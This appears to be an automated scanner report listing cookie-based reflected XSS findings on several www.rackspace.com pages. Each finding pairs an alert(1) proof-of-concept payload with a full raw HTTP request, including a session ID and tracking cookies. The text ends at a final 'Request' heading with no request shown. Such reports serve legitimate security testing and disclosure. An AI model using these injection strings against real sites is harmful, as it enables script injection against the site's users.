The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7985e"><script>alert(1)</script>be554f9bae3 was submitted in the IS_UASrackuid cookie. This input was echoed as 7985e\"><script>alert(1)</script>be554f9bae3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/newsroom/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f87985e"><script>alert(1)</script>be554f9bae3; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a861</script><script>alert(1)</script>f745b7012c9 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/newsroom/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f84a861</script><script>alert(1)</script>f745b7012c9; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ac83"><script>alert(1)</script>febc32dcd56 was submitted in the chatslider cookie. This input was echoed as 6ac83\"><script>alert(1)</script>febc32dcd56 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/newsroom/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D6ac83"><script>alert(1)</script>febc32dcd56; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba33c</script><script>alert(1)</script>ecc30a57054 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/newsroom/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dba33c</script><script>alert(1)</script>ecc30a57054; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2d3b"%3balert(1)//79c0fed0c4 was submitted in the IS_UASrackuid cookie. This input was echoed as a2d3b";alert(1)//79c0fed0c4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8a2d3b"%3balert(1)//79c0fed0c4; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3158"><script>alert(1)</script>e5aacc4613 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8c3158"><script>alert(1)</script>e5aacc4613; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 216a3"><script>alert(1)</script>f17fdb67e52 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D216a3"><script>alert(1)</script>f17fdb67e52; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ca95"%3balert(1)//1125833d53f was submitted in the chatslider cookie. This input was echoed as 4ca95";alert(1)//1125833d53f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D4ca95"%3balert(1)//1125833d53f; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97bda"%3balert(1)//7c3def72b14 was submitted in the IS_UASrackuid cookie. This input was echoed as 97bda";alert(1)//7c3def72b14 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/configurations.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f897bda"%3balert(1)//7c3def72b14; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ed21"><script>alert(1)</script>8032cd80c6d was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/configurations.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f81ed21"><script>alert(1)</script>8032cd80c6d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12910"%3balert(1)//1f149810279 was submitted in the chatslider cookie. This input was echoed as 12910";alert(1)//1f149810279 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/configurations.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D12910"%3balert(1)//1f149810279; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae75c"><script>alert(1)</script>38366e2ccd0 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/configurations.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dae75c"><script>alert(1)</script>38366e2ccd0; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6c97"><script>alert(1)</script>5a98528f5be was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/dedicated_servers.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8b6c97"><script>alert(1)</script>5a98528f5be; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33404"%3balert(1)//57e2c40e1d4 was submitted in the IS_UASrackuid cookie. This input was echoed as 33404";alert(1)//57e2c40e1d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
